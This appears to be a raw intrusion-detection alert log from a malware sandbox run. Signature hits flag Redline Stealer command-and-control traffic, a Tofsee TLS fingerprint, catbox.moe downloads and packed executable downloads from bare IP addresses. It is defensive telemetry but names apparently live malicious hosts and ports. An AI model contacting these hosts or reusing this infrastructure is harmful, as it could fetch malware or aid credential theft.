TCP 192.168.56.101:49320 -> 108.181.20.35:443	2038639	ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI)	Potentially Bad Traffic
TCP 192.168.56.101:49264 -> 108.181.20.35:443	2038639	ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI)	Potentially Bad Traffic
TCP 192.168.56.101:49252 -> 108.181.20.35:443	2038639	ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI)	Potentially Bad Traffic
TCP 192.168.56.101:49264 -> 108.181.20.35:443	906200054	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 192.168.56.101:49252 -> 108.181.20.35:443	906200054	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 192.168.56.101:49264 -> 108.181.20.35:443	2038639	ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI)	Potentially Bad Traffic
TCP 192.168.56.101:49197 -> 108.181.20.35:443	2038639	ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI)	Potentially Bad Traffic
TCP 192.168.56.101:49252 -> 108.181.20.35:443	2038639	ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI)	Potentially Bad Traffic
TCP 192.168.56.101:49197 -> 108.181.20.35:443	906200054	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 192.168.56.101:49323 -> 108.181.20.35:443	2038639	ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI)	Potentially Bad Traffic
TCP 192.168.56.101:49230 -> 77.91.68.68:19071	2043231	ET MALWARE Redline Stealer TCP CnC Activity	A Network Trojan was detected
TCP 192.168.56.101:49323 -> 108.181.20.35:443	906200054	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 192.168.56.101:49188 -> 77.91.124.31:80	2017598	ET MALWARE Possible Kelihos.F EXE Download Common Structure	A Network Trojan was detected
TCP 192.168.56.101:49197 -> 108.181.20.35:443	2038639	ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI)	Potentially Bad Traffic
TCP 192.168.56.101:49188 -> 77.91.124.31:80	2016141	ET INFO Executable Download from dotted-quad Host	Potentially Bad Traffic
TCP 192.168.56.101:49230 -> 77.91.68.68:19071	2043231	ET MALWARE Redline Stealer TCP CnC Activity	A Network Trojan was detected
TCP 192.168.56.101:49323 -> 108.181.20.35:443	2038639	ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI)	Potentially Bad Traffic
TCP 192.168.56.101:49188 -> 77.91.124.31:80	2019714	ET MALWARE Terse alphanumeric executable downloader high likelihood of being hostile	Potentially Bad Traffic
TCP 192.168.56.101:49230 -> 77.91.68.68:19071	2043231	ET MALWARE Redline Stealer TCP CnC Activity	A Network Trojan was detected
TCP 192.168.56.101:49260 -> 108.181.20.35:443	2038639	ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI)	Potentially Bad Traffic
TCP 192.168.56.101:49230 -> 77.91.68.68:19071	2043231	ET MALWARE Redline Stealer TCP CnC Activity	A Network Trojan was detected
TCP 192.168.56.101:49323 -> 108.181.20.35:443	2038639	ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI)	Potentially Bad Traffic
TCP 192.168.56.101:49260 -> 108.181.20.35:443	906200054	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 192.168.56.101:49199 -> 108.181.20.35:443	2038639	ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI)	Potentially Bad Traffic
TCP 192.168.56.101:49230 -> 77.91.68.68:19071	2043231	ET MALWARE Redline Stealer TCP CnC Activity	A Network Trojan was detected
TCP 192.168.56.101:49260 -> 108.181.20.35:443	2038639	ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI)	Potentially Bad Traffic
TCP 192.168.56.101:49199 -> 108.181.20.35:443	906200054	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 192.168.56.101:49230 -> 77.91.68.68:19071	2043231	ET MALWARE Redline Stealer TCP CnC Activity	A Network Trojan was detected
TCP 192.168.56.101:49325 -> 108.181.20.35:443	2038639	ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI)	Potentially Bad Traffic
TCP 192.168.56.101:49199 -> 108.181.20.35:443	2038639	ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI)	Potentially Bad Traffic
TCP 192.168.56.101:49325 -> 108.181.20.35:443	906200054	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 192.168.56.101:49230 -> 77.91.68.68:19071	2043231	ET MALWARE Redline Stealer TCP CnC Activity	A Network Trojan was detected
TCP 192.168.56.101:49325 -> 108.181.20.35:443	2038639	ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI)	Potentially Bad Traffic
TCP 192.168.56.101:49230 -> 77.91.68.68:19071	2043231	ET MALWARE Redline Stealer TCP CnC Activity	A Network Trojan was detected
TCP 192.168.56.101:49268 -> 108.181.20.35:443	2038639	ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI)	Potentially Bad Traffic
TCP 192.168.56.101:49268 -> 108.181.20.35:443	906200054	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 192.168.56.101:49201 -> 108.181.20.35:443	2038639	ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI)	Potentially Bad Traffic
TCP 192.168.56.101:49230 -> 77.91.68.68:19071	2043231	ET MALWARE Redline Stealer TCP CnC Activity	A Network Trojan was detected
TCP 192.168.56.101:49268 -> 108.181.20.35:443	2038639	ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI)	Potentially Bad Traffic
TCP 192.168.56.101:49201 -> 108.181.20.35:443	906200054	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 192.168.56.101:49230 -> 77.91.68.68:19071	2043231	ET MALWARE Redline Stealer TCP CnC Activity	A Network Trojan was detected
TCP 192.168.56.101:49268 -> 108.181.20.35:443	2038639	ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI)	Potentially Bad Traffic
TCP 192.168.56.101:49201 -> 108.181.20.35:443	2038639	ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI)	Potentially Bad Traffic
TCP 192.168.56.101:49230 -> 77.91.68.68:19071	2043231	ET MALWARE Redline Stealer TCP CnC Activity	A Network Trojan was detected
TCP 192.168.56.101:49334 -> 108.181.20.35:443	2038639	ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI)	Potentially Bad Traffic
TCP 192.168.56.101:49334 -> 108.181.20.35:443	906200054	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 192.168.56.101:49230 -> 77.91.68.68:19071	2043231	ET MALWARE Redline Stealer TCP CnC Activity	A Network Trojan was detected
TCP 192.168.56.101:49201 -> 108.181.20.35:443	2038639	ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI)	Potentially Bad Traffic
TCP 192.168.56.101:49334 -> 108.181.20.35:443	2038639	ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI)	Potentially Bad Traffic
TCP 192.168.56.101:49230 -> 77.91.68.68:19071	2043231	ET MALWARE Redline Stealer TCP CnC Activity	A Network Trojan was detected
TCP 192.168.56.101:49288 -> 108.181.20.35:443	2038639	ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI)	Potentially Bad Traffic
TCP 192.168.56.101:49230 -> 77.91.68.68:19071	2043231	ET MALWARE Redline Stealer TCP CnC Activity	A Network Trojan was detected
TCP 192.168.56.101:49334 -> 108.181.20.35:443	2038639	ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI)	Potentially Bad Traffic
TCP 192.168.56.101:49288 -> 108.181.20.35:443	906200054	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 192.168.56.101:49230 -> 77.91.68.68:19071	2043231	ET MALWARE Redline Stealer TCP CnC Activity	A Network Trojan was detected
TCP 192.168.56.101:49208 -> 108.181.20.35:443	2038639	ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI)	Potentially Bad Traffic
TCP 192.168.56.101:49288 -> 108.181.20.35:443	2038639	ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI)	Potentially Bad Traffic
TCP 192.168.56.101:49208 -> 108.181.20.35:443	906200054	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 192.168.56.101:49230 -> 77.91.68.68:19071	2043231	ET MALWARE Redline Stealer TCP CnC Activity	A Network Trojan was detected
TCP 192.168.56.101:49208 -> 108.181.20.35:443	2038639	ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI)	Potentially Bad Traffic
TCP 192.168.56.101:49343 -> 108.181.20.35:443	2038639	ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI)	Potentially Bad Traffic
TCP 192.168.56.101:49229 -> 108.181.20.35:443	2038639	ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI)	Potentially Bad Traffic
TCP 192.168.56.101:49343 -> 108.181.20.35:443	906200054	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 192.168.56.101:49299 -> 108.181.20.35:443	2038639	ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI)	Potentially Bad Traffic
TCP 192.168.56.101:49286 -> 108.181.20.35:443	2038639	ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI)	Potentially Bad Traffic
TCP 192.168.56.101:49299 -> 108.181.20.35:443	906200054	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 192.168.56.101:49343 -> 108.181.20.35:443	2038639	ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI)	Potentially Bad Traffic
TCP 192.168.56.101:49286 -> 108.181.20.35:443	906200054	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 77.91.124.31:80 -> 192.168.56.101:49188	2016538	ET INFO Executable Retrieved With Minimal HTTP Headers - Potential Second Stage Download	Potentially Bad Traffic
TCP 192.168.56.101:49299 -> 108.181.20.35:443	2038639	ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI)	Potentially Bad Traffic
TCP 77.91.124.31:80 -> 192.168.56.101:49188	2021076	ET HUNTING SUSPICIOUS Dotted Quad Host MZ Response	Potentially Bad Traffic
TCP 192.168.56.101:49211 -> 108.181.20.35:443	2038639	ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI)	Potentially Bad Traffic
TCP 192.168.56.101:49286 -> 108.181.20.35:443	2038639	ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI)	Potentially Bad Traffic
TCP 192.168.56.101:49211 -> 108.181.20.35:443	906200054	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 192.168.56.101:49231 -> 108.181.20.35:443	2038639	ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI)	Potentially Bad Traffic
TCP 192.168.56.101:49231 -> 108.181.20.35:443	906200054	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 192.168.56.101:49344 -> 108.181.20.35:443	2038639	ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI)	Potentially Bad Traffic
TCP 192.168.56.101:49211 -> 108.181.20.35:443	2038639	ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI)	Potentially Bad Traffic
TCP 192.168.56.101:49344 -> 108.181.20.35:443	906200054	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 192.168.56.101:49309 -> 108.181.20.35:443	2038639	ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI)	Potentially Bad Traffic
TCP 192.168.56.101:49231 -> 108.181.20.35:443	2038639	ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI)	Potentially Bad Traffic
TCP 192.168.56.101:49309 -> 108.181.20.35:443	906200054	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 192.168.56.101:49344 -> 108.181.20.35:443	2038639	ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI)	Potentially Bad Traffic
TCP 192.168.56.101:49309 -> 108.181.20.35:443	2038639	ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI)	Potentially Bad Traffic
TCP 192.168.56.101:49216 -> 108.181.20.35:443	2038639	ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI)	Potentially Bad Traffic
TCP 192.168.56.101:49232 -> 108.181.20.35:443	2038639	ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI)	Potentially Bad Traffic
TCP 192.168.56.101:49216 -> 108.181.20.35:443	906200054	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 192.168.56.101:49232 -> 108.181.20.35:443	906200054	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 192.168.56.101:49232 -> 108.181.20.35:443	2038639	ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI)	Potentially Bad Traffic
TCP 192.168.56.101:49327 -> 108.181.20.35:443	2038639	ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI)	Potentially Bad Traffic
TCP 192.168.56.101:49216 -> 108.181.20.35:443	2038639	ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI)	Potentially Bad Traffic
TCP 192.168.56.101:49327 -> 108.181.20.35:443	906200054	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 192.168.56.101:49345 -> 77.91.68.3:80	2027250	ET INFO Dotted Quad Host DLL Request	Potentially Bad Traffic
TCP 192.168.56.101:49231 -> 108.181.20.35:443	2038639	ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI)	Potentially Bad Traffic
TCP 192.168.56.101:49327 -> 108.181.20.35:443	2038639	ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI)	Potentially Bad Traffic
TCP 192.168.56.101:49221 -> 108.181.20.35:443	2038639	ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI)	Potentially Bad Traffic
TCP 192.168.56.101:49221 -> 108.181.20.35:443	906200054	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 192.168.56.101:49235 -> 108.181.20.35:443	2038639	ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI)	Potentially Bad Traffic
TCP 192.168.56.101:49329 -> 108.181.20.35:443	2038639	ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI)	Potentially Bad Traffic
TCP 192.168.56.101:49235 -> 108.181.20.35:443	906200054	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 192.168.56.101:49221 -> 108.181.20.35:443	2038639	ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI)	Potentially Bad Traffic
TCP 192.168.56.101:49329 -> 108.181.20.35:443	906200054	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 192.168.56.101:49235 -> 108.181.20.35:443	2038639	ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI)	Potentially Bad Traffic
TCP 192.168.56.101:49329 -> 108.181.20.35:443	2038639	ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI)	Potentially Bad Traffic
TCP 192.168.56.101:49345 -> 77.91.68.3:80	2027250	ET INFO Dotted Quad Host DLL Request	Potentially Bad Traffic
TCP 192.168.56.101:49223 -> 108.181.20.35:443	2038639	ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI)	Potentially Bad Traffic
TCP 192.168.56.101:49223 -> 108.181.20.35:443	906200054	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 192.168.56.101:49238 -> 108.181.20.35:443	2038639	ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI)	Potentially Bad Traffic
TCP 192.168.56.101:49331 -> 108.181.20.35:443	2038639	ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI)	Potentially Bad Traffic
TCP 192.168.56.101:49238 -> 108.181.20.35:443	906200054	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 192.168.56.101:49331 -> 108.181.20.35:443	906200054	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 192.168.56.101:49223 -> 108.181.20.35:443	2038639	ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI)	Potentially Bad Traffic
TCP 192.168.56.101:49238 -> 108.181.20.35:443	2038639	ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI)	Potentially Bad Traffic
TCP 192.168.56.101:49331 -> 108.181.20.35:443	2038639	ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI)	Potentially Bad Traffic
TCP 192.168.56.101:49223 -> 108.181.20.35:443	2038639	ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI)	Potentially Bad Traffic
TCP 77.91.68.3:80 -> 192.168.56.101:49345	2014819	ET INFO Packed Executable Download	Misc activity
TCP 192.168.56.101:49248 -> 108.181.20.35:443	2038639	ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI)	Potentially Bad Traffic
TCP 192.168.56.101:49248 -> 108.181.20.35:443	906200054	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 192.168.56.101:49237 -> 108.181.20.35:443	2038639	ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI)	Potentially Bad Traffic
TCP 192.168.56.101:49333 -> 108.181.20.35:443	2038639	ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI)	Potentially Bad Traffic
TCP 192.168.56.101:49237 -> 108.181.20.35:443	906200054	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 192.168.56.101:49248 -> 108.181.20.35:443	2038639	ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI)	Potentially Bad Traffic
TCP 192.168.56.101:49333 -> 108.181.20.35:443	906200054	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 192.168.56.101:49237 -> 108.181.20.35:443	2038639	ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI)	Potentially Bad Traffic
TCP 192.168.56.101:49333 -> 108.181.20.35:443	2038639	ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI)	Potentially Bad Traffic
TCP 192.168.56.101:49255 -> 108.181.20.35:443	2038639	ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI)	Potentially Bad Traffic
TCP 192.168.56.101:49255 -> 108.181.20.35:443	906200054	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 192.168.56.101:49239 -> 108.181.20.35:443	2038639	ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI)	Potentially Bad Traffic
TCP 192.168.56.101:49239 -> 108.181.20.35:443	906200054	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 192.168.56.101:49338 -> 108.181.20.35:443	2038639	ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI)	Potentially Bad Traffic
TCP 192.168.56.101:49255 -> 108.181.20.35:443	2038639	ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI)	Potentially Bad Traffic
TCP 192.168.56.101:49338 -> 108.181.20.35:443	906200054	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 192.168.56.101:49239 -> 108.181.20.35:443	2038639	ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI)	Potentially Bad Traffic
TCP 192.168.56.101:49293 -> 108.181.20.35:443	2038639	ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI)	Potentially Bad Traffic
TCP 192.168.56.101:49338 -> 108.181.20.35:443	2038639	ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI)	Potentially Bad Traffic
TCP 192.168.56.101:49293 -> 108.181.20.35:443	906200054	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 192.168.56.101:49258 -> 108.181.20.35:443	2038639	ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI)	Potentially Bad Traffic
TCP 192.168.56.101:49258 -> 108.181.20.35:443	906200054	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 192.168.56.101:49338 -> 108.181.20.35:443	2038639	ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI)	Potentially Bad Traffic
TCP 192.168.56.101:49244 -> 108.181.20.35:443	2038639	ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI)	Potentially Bad Traffic
TCP 192.168.56.101:49244 -> 108.181.20.35:443	906200054	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 192.168.56.101:49258 -> 108.181.20.35:443	2038639	ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI)	Potentially Bad Traffic
TCP 192.168.56.101:49244 -> 108.181.20.35:443	2038639	ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI)	Potentially Bad Traffic
TCP 192.168.56.101:49340 -> 108.181.20.35:443	2038639	ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI)	Potentially Bad Traffic
TCP 192.168.56.101:49340 -> 108.181.20.35:443	906200054	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 192.168.56.101:49262 -> 108.181.20.35:443	2038639	ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI)	Potentially Bad Traffic
TCP 77.91.68.3:80 -> 192.168.56.101:49345	2018959	ET POLICY PE EXE or DLL Windows file download HTTP	Potential Corporate Privacy Violation
TCP 192.168.56.101:49262 -> 108.181.20.35:443	906200054	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 192.168.56.101:49340 -> 108.181.20.35:443	2038639	ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI)	Potentially Bad Traffic
TCP 77.91.68.3:80 -> 192.168.56.101:49345	2016538	ET INFO Executable Retrieved With Minimal HTTP Headers - Potential Second Stage Download	Potentially Bad Traffic
TCP 192.168.56.101:49254 -> 108.181.20.35:443	2038639	ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI)	Potentially Bad Traffic
TCP 192.168.56.101:49254 -> 108.181.20.35:443	906200054	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 192.168.56.101:49262 -> 108.181.20.35:443	2038639	ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI)	Potentially Bad Traffic
TCP 192.168.56.101:49254 -> 108.181.20.35:443	2038639	ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI)	Potentially Bad Traffic
TCP 192.168.56.101:49346 -> 108.181.20.35:443	2038639	ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI)	Potentially Bad Traffic
TCP 192.168.56.101:49346 -> 108.181.20.35:443	906200054	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 192.168.56.101:49254 -> 108.181.20.35:443	2038639	ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI)	Potentially Bad Traffic
TCP 192.168.56.101:49270 -> 108.181.20.35:443	2038639	ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI)	Potentially Bad Traffic
TCP 192.168.56.101:49346 -> 108.181.20.35:443	2038639	ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI)	Potentially Bad Traffic
TCP 192.168.56.101:49270 -> 108.181.20.35:443	906200054	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 192.168.56.101:49270 -> 108.181.20.35:443	2038639	ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI)	Potentially Bad Traffic
TCP 192.168.56.101:49256 -> 108.181.20.35:443	2038639	ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI)	Potentially Bad Traffic
TCP 192.168.56.101:49256 -> 108.181.20.35:443	906200054	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 192.168.56.101:49359 -> 108.181.20.35:443	2038639	ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI)	Potentially Bad Traffic
TCP 192.168.56.101:49256 -> 108.181.20.35:443	2038639	ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI)	Potentially Bad Traffic
TCP 192.168.56.101:49359 -> 108.181.20.35:443	906200054	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 192.168.56.101:49271 -> 108.181.20.35:443	2038639	ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI)	Potentially Bad Traffic
TCP 192.168.56.101:49359 -> 108.181.20.35:443	2038639	ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI)	Potentially Bad Traffic
TCP 192.168.56.101:49271 -> 108.181.20.35:443	906200054	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 192.168.56.101:49271 -> 108.181.20.35:443	2038639	ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI)	Potentially Bad Traffic
TCP 192.168.56.101:49257 -> 108.181.20.35:443	2038639	ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI)	Potentially Bad Traffic
TCP 192.168.56.101:49257 -> 108.181.20.35:443	906200054	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 192.168.56.101:49360 -> 108.181.20.35:443	2038639	ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI)	Potentially Bad Traffic
TCP 192.168.56.101:49257 -> 108.181.20.35:443	2038639	ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI)	Potentially Bad Traffic
TCP 192.168.56.101:49360 -> 108.181.20.35:443	906200054	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 192.168.56.101:49272 -> 108.181.20.35:443	2038639	ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI)	Potentially Bad Traffic
TCP 192.168.56.101:49256 -> 108.181.20.35:443	2038639	ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI)	Potentially Bad Traffic
TCP 192.168.56.101:49272 -> 108.181.20.35:443	906200054	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 192.168.56.101:49293 -> 108.181.20.35:443	2038639	ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI)	Potentially Bad Traffic
TCP 192.168.56.101:49272 -> 108.181.20.35:443	2038639	ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI)	Potentially Bad Traffic
TCP 192.168.56.101:49259 -> 108.181.20.35:443	2038639	ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI)	Potentially Bad Traffic
TCP 192.168.56.101:49180 -> 77.91.68.68:19071	2043231	ET MALWARE Redline Stealer TCP CnC Activity	A Network Trojan was detected
TCP 192.168.56.101:49259 -> 108.181.20.35:443	906200054	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 192.168.56.101:49295 -> 108.181.20.35:443	2038639	ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI)	Potentially Bad Traffic
TCP 192.168.56.101:49295 -> 108.181.20.35:443	906200054	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 192.168.56.101:49275 -> 108.181.20.35:443	2038639	ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI)	Potentially Bad Traffic
TCP 192.168.56.101:49259 -> 108.181.20.35:443	2038639	ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI)	Potentially Bad Traffic
TCP 192.168.56.101:49275 -> 108.181.20.35:443	906200054	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 77.91.68.3:80 -> 192.168.56.101:49345	2015744	ET INFO EXE IsDebuggerPresent (Used in Malware Anti-Debugging)	Misc activity
TCP 192.168.56.101:49360 -> 108.181.20.35:443	2038639	ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI)	Potentially Bad Traffic
TCP 192.168.56.101:49295 -> 108.181.20.35:443	2038639	ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI)	Potentially Bad Traffic
TCP 192.168.56.101:49275 -> 108.181.20.35:443	2038639	ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI)	Potentially Bad Traffic
TCP 192.168.56.101:49261 -> 108.181.20.35:443	2038639	ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI)	Potentially Bad Traffic
